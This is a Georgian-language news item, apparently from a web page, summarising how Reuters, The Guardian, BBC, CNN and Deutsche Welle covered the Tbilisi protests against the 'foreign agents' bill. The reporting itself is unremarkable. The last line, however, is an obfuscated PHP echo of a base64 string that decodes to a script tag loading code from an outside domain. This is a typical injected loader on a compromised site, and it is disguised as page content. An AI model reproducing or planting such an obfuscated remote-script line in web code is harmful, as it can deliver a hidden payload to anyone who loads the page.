celsiusi
ავერსი შნაიდერი

 მსოფლიო მედია თბილისში გამართულ მასშტაბურ საპროტესტო გამოსვლებს აშუქებს,  რომელიც „რუსული კანონის“ გუშინ პარლამენტის მიერ I მოსმენით მიღებას მოჰყვა.

გუშინდელ აქციაზე 10 000 მოქალაქე გავიდა პარლამენტთან, - „რამდენიმე ათასი დემონსტრანტი კი მთავრობის ადმინისტრაციასთან შეიკრიბა, რათა პრემიერ ირაკლი კობახიძესთან - კანონპროექტის პრინციპულ მხარდამჭერთან - შეხვედრა მოეთხოვა“ - წერს Reuters-ი.

გამოცემა The Guardian-ი ქართველი ფეხბურთელების პროტესტზე ამახვილებს ყურადღებას.

„საქართველოს ეროვნული ნაკრების წამყვანი მოთამაშეები მასობრივ პროტესტს უჭერენ მხარს, რომელიც „უცხოური გავლენის“ შესახებ კანონპროექტს აპროტესტებენ, კანონს, რომელიც რეპრესიული რუსული კანონის ანალოგია“, - წერს The Guardian-ი.

ბოლო რამდენიმე დღის განმავლობაში საქართველოში განვითარებულ მოვლენებს აშუქებს BBC და CNN-იც. „შეტაკებები საქართველოში სადავო „უცხოური აგენტების“ კანონთან დაკავშირებით“, - წერს CNN გუშინწინ გამართული აქციის დროს დაშავებულების შესახებ.

გერმანული გამოცემა Deutsche Welle კი ყურადღებას „რუსული კანონზე“ ამახვილებს, რომლის მსგავსიც რუსეთში 2012 წელს მიიღეს. „მეზობელმა რუსეთმა მსგავსი კანონი 2012 წელს მიიღო, 2022 წელს კი გაამკაცრა მას შემდეგ, რაც უკრაინაში შეიჭრა. საქართველოს მთავრობის კრიტიკოსები მმართველი ძალის მიერ წარდგენილ კანონპროექტს დაშინების იარაღად მიიჩნევს, ამიტომ მოწინააღმდეგეები მას „რუსულ კანონს“ უწოდებენ“, - წერს გერმანული გამოცემა.

164
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");